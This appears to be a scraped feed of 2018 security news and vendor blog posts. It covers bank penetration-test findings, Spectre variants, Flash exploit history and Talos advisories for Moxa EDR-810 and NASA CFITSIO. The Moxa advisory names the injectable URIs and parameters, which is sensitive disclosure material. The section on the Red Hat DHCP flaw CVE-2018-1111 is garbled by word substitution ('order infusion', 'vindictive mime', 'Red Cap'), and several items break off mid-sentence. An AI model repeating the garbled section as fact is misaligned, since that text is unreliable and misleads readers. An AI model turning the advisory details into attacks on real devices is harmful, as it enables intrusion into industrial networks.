For its report, Positive Technologies analyzed the penetration tests it performed for certain banks over a three-year period. Its analysis suggested the current security level other organizations in the banking sector might have.

The security provider discovered that outdated software comprised the most prevalent type of vulnerabilities affecting banks’ IT assets. This discovery was followed by sensitive data stored in cleartext, dictionary passwords and the use of insecure data transfer protocols — all found in 58 percent of organizations analyzed.

Despite these flaws, penetration testers breached the network perimeter in just 22 percent of cases.

Positive Technologies observed that banks did a good job protecting the network perimeter but failed to safeguard the internal network properly. To illustrate, its researchers discovered dictionary passwords, insufficient protection against recovery of credentials from operating system (OS) memory and insufficient protection of service protocols against attacks at all banks.

These problems led researchers to obtain full control over the infrastructure at all tested banks — with one-third of organizations not even requiring maximum privileges for someone to access the ATMs or payment gateways.

Defending the Internal Network Against Attack

Positive Technologies reported that poor internal network security practices could expose banks to attacks like phishing campaigns. The organization’s cybersecurity resilience lead, Leigh-Anne Galloway, stressed that it’s not impossible to defend against these types of threats. She said banks could effectively prevent loss of funds if they detect an attack in time and implement appropriate security measures.

“Attachments should be scanned in a sandbox, without depending on endpoint antivirus solutions,” Galloway said in a May 2018 press release. “It’s critical to receive and immediately react to alerts with the help of an in-house or contracted 24/7 security operations center. In addition, SIEM [security information and event management] solutions substantially simplify and improve the effectiveness of incident management.”

The security firm also advised in its report that banks should “pool their knowledge” of attacks in an effort to make the industry safer as a whole.

The post Penetration Tests Discover All Banks Are Susceptible to Web App Bugs appeared first on Security Intelligence.

Chinese Hackers Find Over a Dozen Vulnerabilities in BMW Cars

Chinese security researchers have discovered more than a dozen vulnerabilities in the onboard compute units of BMW cars, some of which can be exploited remotely to compromise a vehicle. The security flaws have been discovered during a year-long security audit conducted by researchers from Keen Security Lab, a cybersecurity research unit of Chinese firm Tencent, between January 2017 and

New Spectre-like flaw found in CPUs using speculative execution

A new flaw that can allow an attacker to obtain access to sensitive information on affected systems has been discovered in modern CPUs. CVE-2018-3639, discovered by independently by Google Project Zero and Microsoft Security Response Center researchers and dubbed “Variant 4,” is a Speculative Store Bypass (SSB) vulnerability, and is considered to be a new variant of the previously revealed Spectre Variant 1 vulnerability. “Variant 4 is a vulnerability that exploits ‘speculative bypass.’ When exploited, … More

The post New Spectre-like flaw found in CPUs using speculative execution appeared first on Help Net Security.

The percentage of open source code in proprietary apps is rising

The number of open source components in the codebase of proprietary applications keeps rising and with it the risk of those apps being compromised by attackers leveraging vulnerabilities in them, a recent report has shown. Compiled after examining the findings from the anonymized data of over 1,100 commercial codebases audited in 2017 by the Black Duck On-Demand audit services group, the report revealed that: 96 percent of the scanned applications contain open source components, with … More

The post The percentage of open source code in proprietary apps is rising appeared first on Help Net Security.

A Command Injection Critical Vulnerability Discovered In DHCP




The Dynamic Host Configuration Protocol (DHCP) client incorporated in the Red Hat Enterprise Linux has been recently diagnosed with an order infusion vulnerability (command injection ), which is capable enough to  permit a vindictive mime proficient for setting up a DHCP server or generally equipped for satirizing DHCP reactions and responses on a nearby local network to execute summons with root benefits.

The vulnerability - which is denominated as CVE-2018-1111 by Red Hat - was found by Google engineer Felix Wilhelm, who noticed that the proof-of-exploit code is sufficiently little to fit in a tweet. Red Cap thinks of it as a "critical vulnerability", as noted in the bug report, demonstrating that it can be effectively misused by a remote unauthenticated attacker.

DHCP is utilized to appoint an IP address, DNS servers, and other network configuration ascribes to gadgets on a network. DHCP is utilized as a part of both wired and remote systems. Given that the necessities of utilizing this exploit are basically being on a similar network, this vulnerability would be especially concerned on frameworks prone to be associated with distrustful open Wi-Fi systems, which will probably influence Fedora clients on laptops.

Eventually, any non-isolated system that enables gadgets and various other devices to join without explicit administrator approval, which is ostensibly the purpose of empowering DHCP in any case, is at last a hazard.

This bug influences RHEL 6.x and 7x, and in addition to CentOS 6.x and 7.x, and Fedora 26, 27, 28, and Rawhide. Other operating frameworks based over Fedora/RHEL are probably going to be influenced, including HPE's ClearOS and Oracle Linux, as well as the recently interrupted Korora Linux. Since the issue identifies with a Network Manager Combination script, it is probably not going to influence Linux circulations that are not identified with Fedora or RHEL as they aren’t easily influenced.


Another severe flaw in Signal desktop app lets hackers steal your chats in plaintext

For the second time in less than a week, users of the popular end-to-end encrypted Signal messaging app have to update their desktop applications once again to patch another severe code injection vulnerability. Discovered Monday by the same team of security researchers, the newly discovered vulnerability poses the same threat as the previous one, allowing remote attackers to inject malicious

Red Hat Linux DHCP Client Found Vulnerable to Command Injection Attacks

A Google security researcher has discovered a critical remote command injection vulnerability in the DHCP client implementation of Red Hat Linux and its derivatives like Fedora operating system. The vulnerability, tracked as CVE-2018-1111, could allow attackers to execute arbitrary commands with root privileges on targeted systems. Whenever your system joins a network, it’s the DHCP client

The pace of vulnerability disclosure shows no signs of slowing

Unless the pace of vulnerability disclosure slows down in the coming quarters, we are looking at yet another record-breaking year, according to Risk Based Security’s 2018 Q1 Vulnerability QuickView Report. Note that bug bounties are a subset of the ‘Coordinated Disclosures’ total Key findings 5,375 unique vulnerabilities were reported. This is just a 1.8% increase over the same period in 2017. Note that this number will continue to rise throughout 2018. 1,790 (33.3%) of the … More

The post The pace of vulnerability disclosure shows no signs of slowing appeared first on Help Net Security.

Signal Patches Code Injection Bug that Enabled Remote Code Execution

Signal patched a code injection vulnerability that by some means of exploitation enabled attackers to achieve remote code execution. The security team for the encrypted communications app, a program which has been available for both Android and iOS since November 2015, published a fix for the bug just hours after first being contacted by a […]… Read More

The post Signal Patches Code Injection Bug that Enabled Remote Code Execution appeared first on The State of Security.

Adobe Releases Critical Security Updates for Acrobat, Reader and Photoshop CC

Adobe has just released new versions of its Acrobat DC, Reader and Photoshop CC for Windows and macOS users that patch 48 vulnerabilities in its software. A total of 47 vulnerabilities affect Adobe Acrobat and Reader applications, and one critical remote code execution flaw has been patched in Adobe Photoshop CC. Out of 47, Adobe Acrobat and Reader affect with 24 critical vulnerabilities—

A week in security (May 7 – May 13)

Last week on Labs, we looked at the case of a fake Android AV, an annoying adware that goes by the name of Kuik, the return of threat actors behind the Shopper Stop tech scam, a new Netflix phishing scam, the recent zero-day vulnerability in Internet Explorer, and the insufficiency of merely relying on the presence of the green padlock. Also, in a brief blog post, we talked about why we removed the blacklist of tech support scammers we have been dutifully maintaining for years.

Other news

Stay safe, everyone!

The post A week in security (May 7 – May 13) appeared first on Malwarebytes Labs.

Simple bug could lead to RCE flaw on apps built with Electron Framework

A critical remote code execution vulnerability has been discovered in the popular Electron web application framework that could allow attackers to execute malicious code on victims' computers. Electron is an open source app development framework that powers thousands of widely-used desktop applications including WhatsApp, Skype, Signal, Wordpress, Slack, GitHub Desktop, Atom, Visual Studio

New Rowhammer Attack Can Hijack Computers Remotely Over the Network

Exploitation of Rowhammer attack just got easier. Dubbed ‘Throwhammer,’ the newly discovered technique could allow attackers to launch Rowhammer attack on the targeted systems just by sending specially crafted packets to the vulnerable network cards over the local area network. Known since 2012, Rowhammer is a severe issue with recent generation dynamic random access memory (DRAM) chips in

Zero-day flaw exploited in targeted attacks is fixed by Microsoft

This month's Patch Tuesday bundle of updates from Microsoft included a fix for a critical vulnerability that has been actively exploited by at least one hacking gang in targeted attacks.

The post Zero-day flaw exploited in targeted attacks is fixed by Microsoft appeared first on The State of Security.

Microsoft Patches Two Zero-Day Flaws Under Active Attack

It's time to gear up for the latest May 2018 Patch Tuesday. Microsoft has today released security patches for a total of 67 vulnerabilities, including two zero-days that have actively been exploited in the wild by cybercriminals, and two publicly disclosed bugs. In brief, Microsoft is addressing 21 vulnerabilities that are rated as critical, 42 rated important, and 4 rated as low severity.

A Simple Tool Released to Protect Dasan GPON Routers from Remote Hacking

Since hackers have started exploiting two recently disclosed unpatched critical vulnerabilities found in GPON home routers, security researchers have now released an unofficial patch to help millions of affected users left vulnerable by their device manufacturer. Last week, researchers at vpnMentor disclosed details of—an authentication bypass (CVE-2018-10561) and a root-remote code execution

8 New Spectre-Class Vulnerabilities (Spectre-NG) Found in Intel CPUs

A team of security researchers has reportedly discovered a total of eight new "Spectre-class" vulnerabilities in Intel CPUs, which also affect at least a small number of ARM processors and may impact AMD processor architecture as well. Dubbed Spectre-Next Generation, or Spectre-NG, the partial details of the vulnerabilities were first leaked to journalists at German computer magazine Heise,

GLitch: New ‘Rowhammer’ Attack Can Remotely Hijack Android Phones

For the very first time, security researchers have discovered an effective way to exploit a four-year-old hacking technique called Rowhammer to hijack an Android phone remotely. Dubbed GLitch, the proof-of-concept technique is a new addition to the Rowhammer attack series which leverages embedded graphics processing units (GPUs) to carry out a Rowhammer attack against Android smartphones.

Does Your Family Need a VPN? Here are 3 Reasons it May Be Time

At one time Virtual Private Networks (VPNs) used to be tools exclusive to corporations and techie friends who appeared overly zealous about masking their online activity. However, with data breaches and privacy concerns at an all-time high, VPNs are becoming powerful security tools for anyone who uses digital devices.

What’s a VPN?

A VPN allows users to securely access a private network and share data remotely through public networks. Much like a firewall protects the data on your computer, a VPN protects your activity by encrypting (or scrambling) your data when you connect to the internet from a remote or public location. A VPN allows you to hide your location, IP address, and online activity.

For instance, if you need to send a last-minute tax addendum to your accountant or a legal contract to your office but must use the airport’s public Wi-Fi, a VPN would protect — or create a secure tunnel in which that data can travel —while you are connected to the open network. Or, if your child wants to watch a YouTube or streaming video while on vacation and only has access to the hotel’s Wi-Fi, a VPN would encrypt your child’s data and allow a more secure internet connection. Without a VPN, any online activity — including gaming, social networking, and email — is fair game for hackers since public Wi-Fi lacks encryption.

Why VPNs matter

  • Your family is constantly on the go. If you find yourself conducting a lot of business on your laptop or mobile device, a VPN could be an option for you. Likewise, if you have a high school or college-aged child who likes to take his or her laptop to the library or coffee shop to work, a VPN would protect data sent or received from that location. Enjoy shopping online whenever you feel the urge? A VPN also has the ability to mask your physical location, banking account credentials, and credit card information. If your family shares a data plan like most, connecting to public Wi-Fi has become a data/money-saving habit. However, it’s a habit that puts you at risk of nefarious people eavesdropping, stealing personal information, and even infecting your device. Putting a VPN in place, via a subscription service, could help curb this risk. In addition, a VPN can encrypt conversations via texting apps and help keep private chats and content private.
  • You enjoy connected vacations/travel. It’s a great idea to unplug on vacation but let’s be honest, it’s also fun to watch movies, check in with friends via social media or email, and send Grandma a few pictures. Service to some of your favorite online streaming sites can be interrupted when traveling abroad. A VPN allows you to connect to a proxy server that will access online sites on your behalf and allow a secure and easier connection most anywhere you go.
  • Your family’s data is a big deal. Protecting personal information is a hot topic these days and for good reason. Most everything we do online is being tracked by Internet Service Providers (ISPs). ISPs track us by our individual Internet Protocol (IP) addresses generated by each device that connects to a network. Much like an identification number, each digital device has an IP address which allows it to communicate within the network. A VPN routes your online activity through different IP addresses allowing you remain anonymous. A favorite entry point hackers use to eavesdrop on your online activity is public Wi-Fi and unsecured networks. In addition to potentially stealing your private information, hackers can also use public Wi-Fi to distribute malware. Using a VPN cuts cyber crooks off from their favorite watering hole — public Wi-Fi!

As you can see VPNs can give you an extra layer of protection as you surf, share, access, and receive content online. If you look for a VPN product to install on your devices, make sure it’s a product that is trustworthy and easy to use, such as McAfee’s Safe Connect. A robust VPN product will provide bank-grade encryption to ensure your digital data is safe from prying eyes.

toni page birdsong

 

 

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures).

The post Does Your Family Need a VPN? Here are 3 Reasons it May Be Time appeared first on McAfee Blogs.

Hackers find an ‘unpatchable’ way to breach the Nintendo Switch

Security researchers from ReSwitched have discovered a Nintendo Switch vulnerability that could let hackers run arbitrary code on all current consoles. Dubbed "Fusée Gelée" ("Frozen Rocket") it exploits buggy code in the NVIDIA Tegra X1's USB recovery mode, bypassing software that would normally protect the critical bootROM. Most worrisome for Nintendo is that the bug appears to be unpatchable and could allow users to eventually run pirated games.

Via: Ars Technica

Source: Kate Tempkin (Github)

Despite Decline in Use of Adobe Flash, Vulnerabilities Will Continue to Cause Concern

This post was researched and written with the assistance of Tim Hux, Abhishek Karnik, Asheer Malhotra, and Steve Povolny

McAfee Advanced Threat Research team analysts have studied Adobe Flash Player for years because it is a popular target for attacks. As always, we advise customers to remain current with McAfee’s latest DAT versions. In this post we want to provide some insight into the history of Flash exploitation and possible future trends.

Morphisec published an analysis of a new set of Flash flaws, CVE-2018-4878, that have been exploited in the wild. Hardik Shah of McAfee Labs posted a technical analysis of CVE-2018-4878’s mechanisms on March 2:

“The number of Flash Player exploits has recently declined, due to Adobe’s introduction of various measures to strengthen Flash’s security. Occasionally, however, an exploit still arises. On January 31, Kr-Cert reported a zero-day vulnerability, identified as CVE-2018-4878, being exploited in the field. (Adobe has released an update to fix this flaw.)”

Details about McAfee protections covering CVE-2018-4878 appear at the end of this article.

This post will examine the history of Flash’s issues since the first Common Vulnerabilities and Exposures (CVE) list for Flash was published in 2006. By examining some of the data, both users and owners of sites that employ Flash can better understand Flash flaws and why Flash will continue to interest attackers, even though Adobe will discontinue development of Flash in 2020.

We examined historical Flash data regarding vulnerabilities. We also accounted for the current distribution and uses of Flash. Through this analysis, we believe that despite Adobe announcing Flash’s end of life, a number of sites will continue to use and depend upon Flash for at least the immediate future, even as sites convert to alternative technologies. (See the list of example sites, below.) Flash continues to offer attackers an exploitable collection of flaws for the immediate future.

The following chart uses CVE data. Although not every exploitable and exploited condition receives a CVE entry, most flaws that are discovered through security research or reported against major software vendors’ products eventually gains a CVE number that is posted to the CVE database kept by Mitre. Therefore, CVE offers a convenient repository of vulnerability data to aid research.

Searching the entire database for every instance of “Flash Player” or “Adobe Flash Player” returned 1,050 CVE entries from the years 2006-2017.

There was a steady increase in reported vulnerabilities between 2006 and 2014. Then we saw a big jump in 2015 and 2016. Of the 1,050 issues, about 79% (830) gave attackers some sort of code execution capability, though not every one of those 830 flaws allowed remote code execution. Still, an attacker gains a significant advantage from running any code. The McAfee Labs analysis shows that CVE-2018-4878 was another example of remote code execution, which usually leads to full compromise. This point suggests that Flash vulnerabilities will remain a significant target.

The data source CVE Details offers the following distribution of Flash CVE vulnerabilities:

Source: CVE Details.

In 2015 through 2017, 81% of flaws resulted in code execution of one form or another.

CVE Details also assigns Flash issues with Common Vulnerability Scoring System scores. Many issues from 2015–2017 earned scores above 9, which is considered severe.

  • 2015: 294 vulnerabilities ≥ 9
  • 2016: 224 vulnerabilities ≥ 9
  • 2017: 60 vulnerabilities ≥ 9

These severe scores further highlight why attackers remain interested in exploiting Flash weaknesses; they offer significant “attacker value” for the effort required to exploit them.  Looking at the historical distribution of issues, we see a spike in 2015. Then the spike drops off. It was in the latter part of 2014 that Adobe adopted a change in their software security strategy.

“’Finding and fixing bugs isn’t the way to go, it’s … making it harder and more expensive for [attackers] to achieve an outcome,” said Adobe’s Chief Security Officer, Brad Arkin, at a conference in October 2014. He urged organizations to stop patching every vulnerability and instead increase the cost of exploitation to frustrate attackers. “The bad guys aren’t stupid,” he added. “They are going to apply their resources in the [most] cost efficient way possible, and so they seek to minimize the cost of developing an exploit.”

Adobe’s shift in software security strategy has been to make exploiting issues prohibitively expensive so that attackers will find easier, less resource-intensive, and perhaps more reliable methods. Rather than chase every flaw, Adobe’s approach focuses on building defensive techniques that protect vulnerabilities, just as standard secure development life cycle techniques attempt to prevent new vulnerabilities from being released.

Little in software development happens immediately, especially on a large scale. There is typically a lag—usually one to two years—between a strategy shift and results. In any event, the first issues to be eliminated are often the easiest to fix. As the program’s effectiveness improves, resources are available to address harder problems.

Brad Arkin spoke about a strategy shift in the fall of 2014. We expected that shift to take time, and that is what we see in the data: In 2016, the number of newly discovered issues began to decline. However, the steep increase in vulnerabilities in 2015 and 2016 requires some additional examination.

When security researchers focus on a code base, they generally start by finding the easiest-to-discover issues. As these are found and fixed, researchers probe deeper, shifting to techniques that increase in difficulty. Due to this ever-increasing difficulty, we often see a decrease in discoveries; it takes more time and effort to uncover tricky issues.

Coupling the increasing difficulty of finding problems against the increase in effectiveness of a software security program, we find a distribution like what we have seen with Flash CVE reporting from 2015 through 2017. Until 2015, attackers exploited relatively easy-to-find cross-site scripting errors, but these largely disappeared after 2014. Suddenly, in 2015, there is a huge jump in the discovery of difficult-to-uncover memory issues and code execution opportunities. The leap in the CVE numbers reflects more technically challenging issues surfacing just as Adobe’s software strategy was making its shift.

The new strategy had not had time to be fully effective by 2015. Plus, Flash, like all complex software, carries a large amount of legacy code. Just when researchers were digging deeper and harder into the code base, Adobe’s software security change required not just chasing vulnerability fixes, but also generating protective code and designs—all of which take time to implement. This typical situation explains the influx of critical new issues in 2015, and their subsequent continuous reductions.

Still, no single or collection of security techniques is perfect. In 2017, Flash marked 70 new issues. So far in 2018, three have been discovered. The most recent, CVE-2018-4878, is technically challenging and appears to be within protections that Adobe has placed within byte arrays to prevent these memory structures from being misused. “[CVE-2018-4878] bypassed the byte array mitigation feature that was introduced to prevent ‘length corruption’ attacks in Flash,” wrote McAfee’s Hardik Shah in “How Hackers Bypassed an Adobe Flash Protection Mechanism.”

It is just as possible to unwittingly add an exploitation opportunity when implementing software protections as when writing any other code. Of the 73 vulnerabilities discovered in 2017 and 2018, there is no method, without tracking code changes, to know when each of the flaws was introduced. It is likely that some of them arose in code carried forward from earlier versions, that is, from legacy code. Software implementers have a compelling argument to reuse as much code as possible in each new version. It is cheaper because it saves time.

In a product with a history as long as Flash’s (more than 10 years), some of its code was written for a different threat landscape, not for today’s attackers and their more sophisticated tools and techniques. It is reasonable to suspect that a significant portion of the last two years’ worth of newly discovered issues are in code that has been carried into the latest versions. Those flaws contrast with the most recent vulnerability, CVE-2018-4878, which bypasses and abuses protections that were likely put into place after Adobe’s shift in strategy. The code that CVE-2018-4878 abuses was intended to make exploitation of byte arrays “more expensive.”

To measure the popularity of Flash, we turned to Q-Success’ W3Techs web survey data. The following table shows the use of four client-side languages, with Flash declining steadily since 2011. JavaScript, on the other hand, today is nearly ubiquitous, at 95%. The two leading languages are graphed in the chart that follows the table.

Historical Yearly Trends in the Usage of Client-Side Programming Languages for Websites

Usage (in % of sites) of Client-Side Programming Languages for Websites

Chart data as of March 8, 2018. Source for table and chart: © 2009-2018 Q-Success DI Gelbmann GmbH

From W3Techs data, we can see that Flash use has declined steadily, to only 5% of surveyed web sites. Doesn’t that suggest that Flash exploitation would also decline or even stop? Unfortunately, it does not.

The following W3Techs chart shows that although the number of sites using Flash is fairly low, enough high-traffic sites employ it to keep Flash popular.

High-Traffic Sites That Still Use Adobe Flash

Source: PublicWWW.

If popular websites continue to use Flash, then Flash Player will remain in use on users’ machines for some time. Adobe has promised to continue supporting Flash Player until the end of 2020. Unfortunately, this means merely that software updates, features, and patches will no longer be added; it does not effectively change Flash’s overall use. Only the end of websites requiring Flash will remove its vulnerabilities from the security picture.

A highly targeted attack may need to compromise only a single computer to access an organization’s digital infrastructure and gain access to strategic targets. That single computer could be running an unpatched or dated version of Flash.

As the use of Flash has declined, client-side JavaScript has become the de facto browser programming language. Yet JavaScript’s takeover does not fully solve the problem because it can deliver a Flash payload. Although some of the Flash vulnerabilities we have analyzed can be exploited remotely, many cannot. An attacker often requires some interaction by the victim to run a Flash exploit. JavaScript has become an increasingly common delivery mechanism for this purpose.

DIY: Exploits in a Kit

Perhaps more important to attackers is the easy availability of Flash exploits ready to use in numerous exploit “kits.” Kits package all the necessary code to exercise a set of known vulnerabilities. Access to readily available exploits in a kit means far less attacker effort. Kits also “lower the technical bar.” Attackers need not understand how an exploit works; they can simply leverage the packages without knowing the technical details.

Old Flash exploits are still available, along with new ones such as CVE-2018-4878, according to Tim Hux of the McAfee Advanced Threat Research team. “The Bizarro Sundown (aka GreenFlash) and ThreadKit exploit kits added the exploit to their lists last month,” he said. “The Rig and Magnitude exploit kits added this flaw to their arsenals this month.”

Adding a new exploit does not mean the old ones are no longer available. Exploit kits are additive. The Rig kit, which appeared in 2014, contains the following Flash exploits:

CVE-2013-0634           CVE-2015-3113

CVE-2014-0497           CVE-2015-5119

CVE-2014-0515           CVE-2015-5122

CVE-2014-0569           CVE-2015-7645

CVE-2015-0311           CVE-2016-1019

CVE-2015-0359           CVE-2016-4117

CVE-2015-3090

Old exploits do not die, they just get used less often as software is upgraded to fix earlier versions. If an attacker finds a vulnerable version of Flash in use, kits will have exploits to employ.

Conclusion

It is difficult, and perhaps impossible, to prove that software is error free. (Alan Turing’s famous proof mathematically shows that automated processes cannot be proved correct through automation.) As famed computer scientist Edsger Dijkstra noted, “Testing shows the presence, not the absence of bugs.” (“Software Engineering Techniques,” NATO Science Committee, page 16.) In other words, even software that has passed a battery of security tests before release may still contain exploitable conditions.

From our analysis of the relationship between Flash CVEs and Flash’s ongoing use, especially on high-traffic sites, McAfee’s Advanced Threat Research team believes that Flash vulnerabilities will continue to offer attackers a means toward malicious ends. However, Adobe’s shift in security strategy is an excellent step in reducing the number of newly discovered issues, which should maintain their decline.

McAfee protections for CVE-2018-4878

McAfee’s malware engine can parse Flash for malicious content. Customers who have turned on automatic updates or who update regularly have been protected against seven new variants of CVE-2018-4878 since February 6.

McAfee Host Intrusion Prevention signatures 8001, 1149, 6011, and 6010 detect CVE-2018-4878 exploits.

  • 8001 and 1149: On by default, but log only, not block. Customers can select block.
    • 8001: Suspicious exploit behavior, log only, available in HIPS, not in ENS
    • 1149: CMD tool access by a Windows mail client or Internet Explorer, log only, available in HIPS, not in ENS
  • 6011 and 6010: Off by default. Enabling them may result in an increase of false positives.
    • 6011: Generic application invocation protection, not present in ENS
    • 6010: Generic application hooking protection, not present in ENS

Recent campaigns exploiting Flash Player Issues

CVE-2018-4878: Currently being exploited in a massive spam mail campaign.

CVE-2017-11292: Black Oasis Advanced Persistent Threat

CVE-2016-4117: Hidden Cobra APT/CryptXXX Ransomware/Erebus APT

CVE-2016-1019: Cerber and Locky ransomware/Hidden Cobra APT

CVE-2015-3133: CryptoWall Ransomware

CVE-2015-0311: TeslaCrypt and FessLeak Ransomware

CVE-2014-8439: Cerber Ransomware

CVE-2015-7645: Cerber and Alpha Crypt Ransomware

McAfee does not control or audit third-party benchmark data or the websites referenced in this document. You should visit the referenced website and confirm whether referenced data is accurate.
McAfee and the McAfee logo are trademarks or registered trademarks of McAfee, LLC or its subsidiaries in the US and other countries. Other marks and brands may be claimed as the property of others. Copyright © 2018 McAfee, LLC

The post Despite Decline in Use of Adobe Flash, Vulnerabilities Will Continue to Cause Concern appeared first on McAfee Blogs.

Vulnerability Spotlight: Multiple Vulnerabilities in Moxa EDR-810 Industrial Secure Router

These vulnerabilities were discovered by Carlos Pacho of Cisco Talos

Today, Talos is disclosing several vulnerabilities that have been identified in Moxa EDR-810 industrial secure router.

Moxa EDR-810 is an industrial secure router with firewall/NAT/VPN and managed Layer 2 switch functions. It is designed for Ethernet-based security applications in remote control or monitoring networks. Moxa EDR-810 provides an electronic security perimeter for the protection of critical assets such as pumping/ treatment systems in water stations, DCS systems in oil and gas applications, and PLC/SCADA systems in factory automation.

Moxa has released an updated version of the firmware. Users are advised to download and install the latest release as soon as possible to fix this issue.


Vulnerability Details

TALOS-2017-0472 (CVE-2017-12120) Moxa EDR-810 Web Server ping Command Injection Vulnerability


TALOS-2017-0472 is an exploitable command injection vulnerability that exists in the web server functionality of Moxa EDR-810. A specially crafted HTTP POST can cause a privilege escalation resulting in attacker having access to a root shell. An attacker may be able to inject OS commands into the ifs= parm in the "/goform/net_WebPingGetValue" uri to trigger this vulnerability and take control over the targeted device.

TALOS-2017-0473 (CVE-2017-12121) Moxa EDR-810 Web RSA Key Generation Command Injection Vulnerability


TALOS-2017-0473 is an exploitable command injection vulnerability that exists in the web server functionality of Moxa EDR-810. A specially crafted HTTP POST can cause a privilege escalation resulting in attacker having access to a root shell. An attacker can inject OS commands into the rsakey\_name= parm in the "/goform/WebRSAKEYGen" uri to trigger this vulnerability and take control over the targeted device.

TALOS-2017-0474 (CVE-2017-14435 to 14437) Moxa EDR-810 Web Server strcmp Multiple Denial of Service Vulnerabilities


TALOS-2017-0474 describes three separate exploitable denial of service vulnerabilities that exist in the web server functionality of Moxa EDR-810. A specially crafted HTTP URI can cause a null pointer dereference resulting in denial of service. An attacker can send a GET request to "/MOXA_LOG.ini, /MOXA_CFG.ini, or /MOXA_CFG2.ini" without a cookie header to trigger this vulnerability.

TALOS-2017-0475 (CVE-2017-12123) Moxa EDR-810 Cleartext Transmission of Password Vulnerability


TALOS-2017-0475 is an exploitable clear text transmission of password vulnerability that exists in the web server and telnet functionality of Moxa EDR-810. An attacker may be able to inspect network traffic to retrieve the administrative password for the device. The attacker may then use the credentials to login into the device web management console as the device administrator.

TALOS-2017-0476 (CVE-2017-12124) Moxa EDR-810 Web Server URI Denial of Service Vulnerability


TALOS-2017-0476 is an exploitable denial of service vulnerability that exists in the web server functionality of Moxa EDR-810. Access to a specially crafted HTTP URI can cause a null pointer dereference resulting in the web server crashing. An attacker can send a crafted URI to trigger this vulnerability.

TALOS-2017-0477 (CVE-2017-12125) Moxa EDR-810 Web Server Certificate Signing Request Command Injection Vulnerability


TALOS-2017-0477 is an exploitable command injection vulnerability that exists in the web server functionality of Moxa EDR-810. A specially crafted HTTP POST request can cause a privilege escalation resulting in access to root shell. An attacker may be able to inject OS commands into the CN= parm in the "/goform/net_WebCSRGen" uri to trigger this vulnerability.

TALOS-2017-0478 (CVE-2017-12126) Moxa EDR-810 Web Server Cross-Site Request Forgery Vulnerability


TALOS-2017-0478 is an exploitable cross-site request forgery (CSRF) vulnerability that exists in the web server functionality of Moxa EDR-810. A specially crafted HTTP request can trigger a CSFR vulnerability which may allow the attacker to change the device configuration. An attacker can create a malicious html code to trigger this vulnerability and entice the user to execute the malicious code.

TALOS-2017-0479 (CVE-2017-12127) Moxa EDR-810 Plaintext Password Storage Vulnerability


TALOS-2017-0479 is a password storage vulnerability that exists in the operating system functionality of Moxa EDR-810. The device stores credentials in plaintext in /magicP/cfg4.0/cfg_file/USER_ACCOUNT.CFG. This file mirrors the contents of /etc/shadow, except that all the passwords are stored in plaintext.

TALOS-2017-0480 (CVE-2017-12128) Moxa EDR-810 Server Agent Information Disclosure Vulnerability


TALOS-2017-0480 is an exploitable information disclosure vulnerability that exists in the Server Agent functionality of Moxa EDR-810. A specially crafted TCP packet can cause the device to leak data and result in an information disclosure. An attacker may be able to send a specially crafted TCP packet to trigger this vulnerability.

TALOS-2017-0481 (CVE-2017-12129) Moxa EDR-810 Web Server Weak Cryptography for Passwords Vulnerability


TALOS-2017-0481 is an exploitable Weak Cryptography for Passwords vulnerability that exists in the web server functionality of Moxa EDR-810. After the initial login, each authenticated request sends a HTTP packet with a MD5 hash of the password. This hash is not salted and can be cracked, revealing the device's password.

TALOS-2017-0482 (CVE-2017-14432 to 14434) Moxa EDR-810 Web Server OpenVPN Config Multiple Command Injection Vulnerabilities


TALOS-2017-0482 describes multiple exploitable command injection vulnerabilities that exist in the web server functionality of Moxa EDR-810. A specially crafted HTTP POST request may cause a privilege escalation resulting in an attacker having access to a root shell. An attacker may be able to inject OS commands into various parameters in the "/goform/net_Web_get_value" uri to trigger this vulnerability.

TALOS-2017-0487 (CVE-2017-14438 and 14439) Moxa EDR-810 Service Agent Multiple Denial of Service


TALOS-2017-0487 describes two exploitable denial of service vulnerabilities that exist in the Service Agent functionality of Moxa EDR-810. A specially crafted packet can cause a denial of service. An attacker may be able to send a large packet to tcp ports 4000 or 4001 to trigger this vulnerability.

For the full technical details of these vulnerabilities, please refer to the vulnerability advisories that are posted on our website:

http://www.talosintelligence.com/vulnerability-reports/

Affected versions


The discovered vulnerabilities have been confirmed in Moxa EDR-810 V4.1 build 17030317 but they may also affect earlier versions of the product.

Discussion


Industrial control systems (ICS), including supervisory control and data acquisition (SCADA) systems, are used in industries such as energy providers, manufacturing and critical infrastructure providers in order to control and monitor various aspects of various industrial processes. ICS systems employ many mechanisms and protocols also used in traditional IT systems and networks.

Although some characteristics of traditional IT systems and ICS are similar, ICS also have characteristics that differ in their service level and performance requirements. Many of these differences come from the fact that ICS has a direct effect on the physical world which may also include a risk to the health and safety of the population and a potential to cause damage to the environment. For that reason ICS have unique reliability requirements and may use real-time operating systems and applications that would not be used in everyday IT environments.

One of the pillars of ICS security, as well as the security of traditional IT networks, is restricting access to network activity. This may include unidirectional gateways, a demilitarized zone (DMZ) network architecture with firewalls and separate authentication mechanisms and credentials for users of corporate and ICS networks.

ICS devices, including firewalls that secure networks, run software which can contain vulnerabilities and serve as a pathway that may allow attackers to take advantage and intrude into an ICS network environment.

Cisco Talos vulnerability research team also focuses on non traditional computing environments, including ICS, to find previously unknown vulnerabilities and work with vendors to responsibly disclose them while allowing the vendor enough time to improve security of the products by fixing the discovered vulnerabilities.

Moxa EDR-810 is one of the devices specialized in providing firewalls specifically designed to function within ICS infrastructure and provide network security to ICS processes. Cisco Talos researchers have discovered several vulnerabilities affecting the security of the product. Moxa EDR-810 users are recommended to update the software as soon as possible to avoid their ICS environment potentially being exploited by attackers.

Coverage


The following Snort Rules detect attempts to exploit these vulnerabilities. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For all current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules:

  • 31939, 40880, 44835-44837, 44840-44842, 44847-44852, 44855, 44858

Vulnerability Spotlight: TALOS-2018-0529-531 – Multiple Vulnerabilities in NASA CFITSIO library

Vulnerabilities discovered by Tyler Bohan from Talos


Overview

Talos is disclosing three remote code execution vulnerabilities in the NASA CFITSIO library. CFITSIO is a library of C and Fortran subroutines for reading and writing data files in the Flexible Image Transport System (FITS) data format. FITS is a standard format endorsed by both NASA and the International Astronomical Union for astronomical data.

Specially crafted images parsed via the library can cause a stack-based buffer overflow, overwriting arbitrary data. An attacker can deliver a malicious FIT image to trigger this vulnerability, and potentially gain the ability to execute code.



Details

Exploitable buffer overflow vulnerabilities exist in the image parsing functionality of the CFITSIO library version 3.42.

